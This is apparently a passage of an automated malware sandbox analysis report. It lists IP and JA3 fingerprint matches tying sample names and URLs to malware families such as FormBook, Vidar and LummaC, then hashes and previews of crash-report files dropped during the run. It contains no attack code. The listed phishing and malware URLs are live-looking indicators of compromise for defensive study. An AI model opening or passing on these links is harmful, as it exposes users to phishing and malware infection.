	http://airdrop-manta-pacific-99s.pages.dev/	Get hash	malicious	Unknown	Browse	15.197.222.64
	https://www.iheartjane.com/embed/stores/3953/menu	Get hash	malicious	Unknown	Browse	15.197.213.252
	ptsss.exe	Get hash	malicious	FormBook	Browse	15.197.204.56
	QSFD.exe	Get hash	malicious	FormBook	Browse	15.197.192.55
	http://mantraonlittlebourke.guestreservations.com/35061/booking?gad_source=1&gclid=EAIaIQobChMIl-2ym7yFiAMV19QWBR2tTADfEAAYAiAFEgIBzPD_BwE	Get hash	malicious	Unknown	Browse	15.197.193.217
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	15.197.148.33
	AK4UlXhsnL.exe	Get hash	malicious	Unknown	Browse	15.197.204.56
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Unknown	Browse	23.59.250.80
	file.exe	Get hash	malicious	Unknown	Browse	23.219.82.57
	file.exe	Get hash	malicious	Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	Unknown	Browse	104.70.121.216
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.9
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.42
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.42
	file.exe	Get hash	malicious	Unknown	Browse	23.219.161.132
	Review_Aonoro.pdf	Get hash	malicious	Unknown	Browse	88.221.110.136
	https://email.mail.shpcfirm.com/c/eJxUk7uyur4CRp9Guzi5AaGwAARF9t7e8PKzcUJIJAoIgqA8_RmrM_-v_Va5Fq-qi06njHOLUYVAqpQBKEU24AwjQLhhKC4tm5BknE4VRYwzOpZTZGFKiGkwPM6mDEqk0oQrwyLCEBSbkJqJKVJBKEuxHOsphphChjGimEA0sRBOGGemaWAhCU9HFBZc55Mmq4TSz2IiHsU4n2ZtWzUj4oxwMMLBtcD9gCdKMzZRaXOXX2qEAym-p_OdW7zh0fgpleU-PKuk4XwTP-WVOJsCgbisZ1UZicMrudqnILjugcf7rh4yF1bzINM2TO51maW3f2azdXtwMl4GQGrZG0N7ivel723lLmw-4QWs3k9xrZ4CH6y_MI9k4PW9dy9uh-PBBmShV8sDOeGzPVs7dy6KLlLc29bqsZZdpKGOvYggr3yxrhHx0Aymrx59x89td7857nJv2HV4gcPO47jCj4Xrn56yQH7oM7mogYP-THjwryX0amv1l-Td6r6OeV5aLLILqxCBa77dY9T2-cqul7vNL1JZvNwm4rR3_PiMHs469F8980zf__fyRWonrMrkO1Q1zE7Cvv2hMjPmhdgmND1vAzfyz0IH-Vuud40fWDr_cS4P9pGbwzolWZ97Q1yHHvWOrhE9PzPkcX9nlgt83Gh0ur-Sn3Axd6_zUG3KXD5_X9H-aGMdtOcOz6XuhrvvoJ2Wm2WVGJvdp43vDZcIkJ_ZYJUZuxaxAodf7_1SSTy3FdbeYPImUNcRmY3LR6uVFrzVj_IrsyGwZEggYBkcAyoxAzaVFNiYMmFAiASH4yrnH_n84oKntmkxAUxKMKBcQMAVTAFPTBMzBUnC7PFzenvlWo4o_I-ijSzTS6uL_wdh2eNuiv8XAAD__xdyDpE	Get hash	malicious	HTMLPhisher	Browse	172.233.33.242
AMAZON-AESUS	Adobe Download Manager.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	44.221.84.105
	http://ikenn99.store/	Get hash	malicious	Unknown	Browse	18.211.221.153
	http://solarrebater.org/	Get hash	malicious	Unknown	Browse	34.227.216.239
	https://www.evernote.com/shard/s561/sh/11f2002c-b1a0-eb62-6088-816b3f90b1bb/Fg7pFg2UgsqSSiKlZa-LSaNHwI-aq133o_EjOkBitzRaEPMq5fq9Vaoh8A	Get hash	malicious	HTMLPhisher	Browse	34.235.253.128
	FW_ SLS properties Credit application.msg	Get hash	malicious	Unknown	Browse	52.71.28.102
	https://embeds.beehiiv.com/6ccbaa66-d598-45d6-bc9c-c0957ce3574c	Get hash	malicious	HTMLPhisher	Browse	3.89.65.79
	https://bstouten.sazular.com/?preview=1&v=99098329	Get hash	malicious	HTMLPhisher	Browse	34.202.63.170
	https://l4vm89ff.r.us-west-2.awstrack.me/L0/https:%2F%2Fsnip.ly%2FFedExx/1/010101917bbe6db8-0435991f-93dd-44cd-b7b8-51bfd5cf53c7-000000/HIvKUOwubES5gbenLtlgHO_SzP8=389	Get hash	malicious	Unknown	Browse	104.192.142.23
	Review_Aonoro.pdf	Get hash	malicious	Unknown	Browse	54.167.154.99
	http://url103.dignitycampaign.net/ls/click?upn=u001.Cas5ugePNtSf1mSWabrqo3mcJtdueilvOPTgzdlEpUd4GqCBNMVtW-2F-2F2wgGqCLpTN6dAfdijLlYq9iwquJXmE-2BZj79F37Z0CckED5TsG4fQ25o-2Fg-2FPDuwQBBWHkJ8RPrCF5saPUwaAjeZZiD8h-2FB9W48m4tIaN6GGErXkSFKFmDgBEYW1T7k-2FnXnvn8ldLi-2FIdfk0aRSirefRJxNUdOIGpZfncANcS7uFNatgOPxV2Ygm6fLOUWLotwEqsin4Y1CmtZ7BxfF5foNolE-2Boa25K-2B7wPI3V-2B767Ve4mOhPgJzLgSnGmthLVhWy6BYQf00QNI659fk8q12w02DBMlmMrw3khDr3cnNgYYng2Y5i7BXuipr6DyeGT98fM-2FKBVEQSrbKIquH3JWJaaXzReEynWFW3nTYFz4s5xNRnFU5AokDAcZstvVwxKq-2FJ1IjM1twMf6Hwg_J4YDns4pksLrb17hOXi2aOEwqj3m3dsJSi8gSl9zOoLhblODLjz6IKGTmKF92YKf5UEx9qOPJhvHxt6OvXPWhTIMtIICg1dYT0JxHA0xPVOIL6-2FatGunkes1VHfyRgkBTjXb0N8OIv5rbfThOrNJV8o4LJaaqlIOJB8KNeMcZLv1BO01a-2BZFPSvVNpAIaUaUnS-2BTtMnNrsqDBXNDQiQ2C60GIMOxXkEBDcUqmXWKAXHT2jyJKnE-2BTVX7Dn6v15EXXnFGV7DsBJuyOfxy4Jpp-2FDgxjoJYvwKKleeNMeZbnV7GSaFm53K3rrMP7FHypDrTj5gZolkQN74G665MiZOGOEsJpZBxGWUmRe5KD1lnqv9UsmS5oXGuT59ef-2B-2BOIJwozGuQ8LcLU9sq2bhaxr5QKojdGSLYHkQV48pY3diE-2FSKipsOxgeSp8hri35emljCrDJ8o2gvEcqTrgSbi5z9cBSKny1JK-2FAw-2B-2Bt5GdKd66pp3fqQXb-2FO03pmb7PSvgIGO-2BeUcgeDGkShCS6uwIbaWf92ZS-2BRnf-2BH4JXvcFqQFMHG6QluReLkOtpCzV5c3fz0XkA9GRQTJKj7LLrgRu3TEig-3D-3D	Get hash	malicious	Unknown	Browse	52.21.16.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	x64_x32_installer__v4.2.2.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	tKr6T60C1r.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	SUBOLETO202408-6861385.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	SUBOLETO202408-6861385.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	javawvd.exe	Get hash	malicious	Unknown	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_310b6296-9368-4a8b-a68a-99020108e769\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9872743795299321
Encrypted:	false
SSDEEP:	96:iOFOaxeVuXs1hJoI7JfdQXIDcQvc6QcEVcw3cE/H+HbHgnoW6He1Oy1QaSWAEN9h:lkoeUXD0BU/AjR9SKzuiFDZ24IO8m
MD5:	204BC1B1BE4B77670B518FD3463CB3EF
SHA1:	A7FC8EF0D9320301C91A95AEA3019327D730E90C
SHA-256:	93328371BFFDDE733CB1FDED9C6257949827D288813B6ADD7B51C815554A05DD
SHA-512:	27A4DC21E5521294541D34588963C8BF6DFF3A087ECBA3719BF03A4CE967EAB1BB55A88D073DC25E5183ADDE5B191452AA45C1E6F204878529FB331A6145E4AC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.4.9.7.0.1.1.9.0.8.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.4.9.7.0.7.7.5.3.2.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.0.b.6.2.9.6.-.9.3.6.8.-.4.a.8.b.-.a.6.8.a.-.9.9.0.2.0.1.0.8.e.7.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.1.5.5.3.4.-.4.2.7.c.-.4.f.a.4.-.8.9.9.4.-.c.d.0.8.6.4.5.2.5.b.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.O.z.T.Q.C.D.S.V.N.r.W.D.m.u.G.q.z.F.b.K.R.b.Z.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.9.c.-.0.0.0.1.-.0.0.1.4.-.5.f.b.1.-.9.2.6.2.7.b.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.8.f.9.6.4.8.2.e.2.e.a.d.a.9.c.2.a.f.8.7.9.e.2.b.7.f.8.6.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.o.O.z.T.Q.C.D.S.V.N.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_8c845241-7f00-459b-a1f3-afea684e5b50\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0648867226537901
Encrypted:	false
SSDEEP:	192:zOKleUMD0BU/AjR9SNnVBzuiFDZ24IO8m:zJzMwBU/AjbKzuiFDY4IO8m
MD5:	794D12F85514E6ACC233E4F98F129580
SHA1:	99202F7C474311113883214A32529BEDAA48E9A8
SHA-256:	A1DF086F67C264750C76817834BF173E8AF4931F754A7DFF136E8774179F9F77
SHA-512:	F7EFE939861FC5D72B092A502973EB90BD72FF71CC65FF51EDB13EF9BFE93F69B8327853253D66A1F735057015E4A67170A657E361F309FBA2B7FE64B7228D4D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.4.9.6.7.0.7.7.0.2.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.4.9.6.8.1.7.0.7.8.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.8.4.5.2.4.1.-.7.f.0.0.-.4.5.9.b.-.a.1.f.3.-.a.f.e.a.6.8.4.e.5.b.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.d.5.f.3.2.7.-.8.e.0.e.-.4.3.3.f.-.b.e.b.b.-.e.f.e.d.9.0.9.4.b.c.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.O.z.T.Q.C.D.S.V.N.r.W.D.m.u.G.q.z.F.b.K.R.b.Z.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.a.c.-.0.0.0.1.-.0.0.1.4.-.6.1.d.5.-.9.b.6.2.7.b.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.8.f.9.6.4.8.2.e.2.e.a.d.a.9.c.2.a.f.8.7.9.e.2.b.7.f.8.6.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.o.O.z.T.Q.C.D.S.V.N.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_a62cb88f-4d50-4d56-815a-1be4f90889c4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9873652185671744
Encrypted:	false
SSDEEP:	96:zYQF1peVuCs1hJoI7JfdQXIDcQvc6QcEVcw3cE/H+HbHgnoW6He1Oy1QaSWAEN9y:zFZeUCD0BU/AjR9SKzuiFDZ24IO8m
MD5:	59CB6C435F926131F499D32F5941A52E
SHA1:	935F3CBEB96FE8FAD4EDD96FF72578EF58E8ECCE
SHA-256:	97D7EED47500AB76C9825929F508D0F4DD86E0D2BA456CC4046B8F8EE6432484
SHA-512:	2A0E849247EA32C8CCE3884D9EB5544E41CB8A67DFE2084AC457366AA882A72B745E8DC3376098387B3FEFD19FCC38B20FE7EA282495C0F7326276A16CCA27BF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.4.9.6.7.4.4.6.9.4.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.4.9.6.8.2.9.0.6.9.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.2.c.b.8.8.f.-.4.d.5.0.-.4.d.5.6.-.8.1.5.a.-.1.b.e.4.f.9.0.8.8.9.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.d.b.9.5.6.6.-.a.4.5.b.-.4.0.2.f.-.9.2.8.0.-.7.c.a.d.b.0.4.e.3.b.8.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.O.z.T.Q.C.D.S.V.N.r.W.D.m.u.G.q.z.F.b.K.R.b.Z.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.4.0.-.0.0.0.1.-.0.0.1.4.-.b.9.b.c.-.9.9.6.2.7.b.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.8.f.9.6.4.8.2.e.2.e.a.d.a.9.c.2.a.f.8.7.9.e.2.b.7.f.8.6.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.o.O.z.T.Q.C.D.S.V.N.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oOzTQCDSVNrWDmuG_d5242147ed8425046ac7aa4f5431f81faef10e7_79a3f19c_a7d0f928-ee14-4250-a92c-2d4ce37aecb6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0519425360922412
Encrypted:	false
SSDEEP:	96:0GFTeVuOs1hJoI7JfdQXIDcQvc6QcEVcw3cE/H+HbHgnoW6He1Oy1QaSWAEN9WKi:rheUOD0BU/AjR9SNnVwzuiFeZ24IO8m
MD5:	D7B1AD2C5688D65DA51473E1456F2961
SHA1:	B379536A8A6207CBA9CC646ABBE48CC8C5804D88
SHA-256:	EF7FFB273EE664AD43B5D3A06CFF8572825EC8B8825BF029D2154B839BB44B62
SHA-512:	6E68EDFF3AC75AAA52A6D532463E6548A0E4DEA0F43B1A8BCB518BC83728EE595E2DB0D3E00CBABC0122F67628F11DD724EAAC26D6A0AA6076061728A0A38E1D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.4.9.6.8.8.2.7.7.9.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.4.9.7.0.5.4.6.5.4.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.d.0.f.9.2.8.-.e.e.1.4.-.4.2.5.0.-.a.9.2.c.-.2.d.4.c.e.3.7.a.e.c.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.6.6.b.a.a.2.-.3.6.5.3.-.4.7.a.6.-.b.9.8.c.-.d.3.c.b.2.9.a.4.b.6.0.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.O.z.T.Q.C.D.S.V.N.r.W.D.m.u.G.q.z.F.b.K.R.b.Z.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.4.-.0.0.0.1.-.0.0.1.4.-.0.e.a.a.-.9.6.6.2.7.b.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.8.f.9.6.4.8.2.e.2.e.a.d.a.9.c.2.a.f.8.7.9.e.2.b.7.f.8.6.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.o.O.z.T.Q.C.D.S.V.N.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE33.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:42:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	241546
Entropy (8bit):	1.5884082098060772
Encrypted:	false
SSDEEP:	768:rY23Os3zjmMnXC6rdeutQmFlonF8oKrOZP:B3IB6Beh2RrO5
MD5:	732BEF9CE57B50891490DD320735B168
SHA1:	3545B9E742BE8E4C1F0FF876E466068C18CC1113
SHA-256:	A8E5A886DAD6DDDB4F9DFD80B11A97D3E48DDF0FFE4BFA288023B7DDFAAA2173
SHA-512:	F5B7EA727DE6C1A2C3FC54089BE32859342C8EB86D722729316106B98F3637FBD1DDD633A15067C7129F8E2A6CB3E0390FB5E3A25F2FCC35E2A7DB2C81AC4892
Malicious:	false
Preview:	MDMP..a..... ..........f........................T...............8z..........T.......8...........T...........PQ..:^..........@%..........,'..............................................................................eJ.......'......GenuineIntel............T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF9B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:42:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	114954
Entropy (8bit):	1.7053526766796658
Encrypted:	false
SSDEEP:	384:KhO7tPVesNWu5w6hZpxTo1To0lRhah6+JzYKJGt31nVZ0:gcttesNWu5LhZpxeoQ+9YK+NT
MD5:	D77049731F7A9AF6C71B61861949ADA8
SHA1:	2AFAAE5D7BB93462E046F76107B10F69C7F53767
SHA-256:	18A5EBA66CF3C4345696E9F9F9F23B5289333489D79D7A6747B90AA53572518D
SHA-512:	6EFD93FB32F3D536450FD7D6ADBD5DD900C3B180E6034DA9A7B6637DB6736361733DCFDFF1D2DA625AEF97E956E5ED078735C7AD687BF8920E39053D2420D7A4
Malicious:	false
Preview:	MDMP..a..... ..........f............D...........D...L.......D....J..........T.......8...........T............'..".......................\|...............................................................................eJ....... ......GenuineIntel............T.......@.....f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD028.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8424
Entropy (8bit):	3.713610795871834
Encrypted:	false
SSDEEP:	192:R6l7wVeJB16XTe6YEIwSUhJgmfxWprT89bVgsfN6Hm:R6lXJD6a6YE/SUhJgmfxvVzfJ
MD5:	729E16DC87AC6A477CC74CD45E111BC9
SHA1:	8826186F944ABF76065D4A7C70029C5A916F4274
SHA-256:	700297EFB090BCF540F5BD7CCB943D4453B1101C480D761C33EC8E1E8D522B96
SHA-512:	6E3A6F8F8CAFA7D40EEE84AA73F097D361E00EBE980649EAAB08588D5DF77B620626328CA3E538FF0A9B4EDDCDA2CF73501D38753F9CA8643532F8DB6D1983B4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD058.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.582832778558491
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg77aI9orWpW8VYeIYm8M4JogFS+q8f/WRogM2id:uIjfLI7Ga7VbJeiWRoR2id
MD5:	22DE2830AC261A192DDACD0D92B7F39F
SHA1:	6CA9FDDE696342BC06BAFEBE79255C2ECA7CAFF6
SHA-256:	068C06C112A6979A710AA367FF49263701E798B1CEFF6AD63418449BCD67A88D
SHA-512:	8A8B1D533941A8393F6B4C7414D1F7A9E82F25AAE589B8AA35778CC4AE19293CDB656EE7484A44ECF87013EFB0F98A9DEC2C7A41F00A62ED6E35EE57DBD9744F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468465" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD066.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85160
Entropy (8bit):	3.1080493549900257
Encrypted:	false
SSDEEP:	768:hBnxIOqiz7odeRHSvFCWl23djuGT0FFp17n4vr2FYRQfllm92SV7X:XneOxn4eRHrWl3k0FFp1mrpQzSVL
MD5:	FE25D348CD2731BF253CF53780203559
SHA1:	5090309742390EBA54E4E57CA0AE948EFE10E7B9
SHA-256:	DAA7289660BC66247EB34E7E8CC56B31D1BC118DA62D24E5825A1D1456B3D666
SHA-512:	D7E134D9D48E5809597A6F60827258B4BEF9AB2DD73D4472D434AE2009ACF1A20CF4CC6BF87F21F84835341C05E363AFB7C0780A08521F4FBCE49A1113303DB7
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD067.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
